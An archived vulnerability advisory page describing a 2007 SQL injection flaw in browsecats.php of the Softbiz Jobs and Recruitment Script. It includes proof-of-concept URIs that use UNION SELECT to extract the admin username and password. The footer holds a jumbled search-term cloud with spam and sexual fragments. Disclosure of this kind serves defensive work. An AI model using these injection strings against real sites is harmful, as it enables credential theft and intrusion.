about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Softbiz Jobs and Recruitment Script Browsecats.PHP SQL Injection Vulnerability


Title Softbiz Jobs and Recruitment Script Browsecats.PHP SQL Injection Vulnerability
Published 2007-10-09-12:00AM
Updated 2007-10-10-06:38PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  IRCRASH is credited with the discovery of this vulnerability.
Vulnerable  SoftBiz Jobs and Recruitment Script 0
Not Vulnerable  
Code  Attackers can use a browser to exploit this issue.The following proof-of-concept URIs are available:http://www.example.com/browsecats.php?cid=[sql code]
http://www.example.com/browsecats.php?cid=999999%20union/**/select/**/0,sb_admin_name,2,3/**/from/**/sbjbs_admin/*
http://www.example.com/browsecats.php?cid=999999%20union/**/select/**/0,sb_pwd,2,3/**/from/**/sbjbs_admin/*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 17:22:03 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
cor php-nuke 2 AKS.UANGOM AISHWARYAR peeing vid com_phpsho 200 /compo bikini gir xvidoe fre www.amoswe lo347l AISH www.auto-t com_phpsho 200 /compo remote fil www.ywnczl butt six vedio ACTORS Sex3g powered by Microsoft omid SEX MMS www.sexvd A009438 Tagger LE. SEXSEEN SAKILA ACT free sex m Tagger LE. www.31660. Www.Englan A/31377os. 543742717. www.jdbbs. mambo Remo A+href+www Www+hotgri Tagger LE. BELLE msql injec t610t Tagger LE. A naked bo ping TROPOPAUSE xingbayou m...etup[u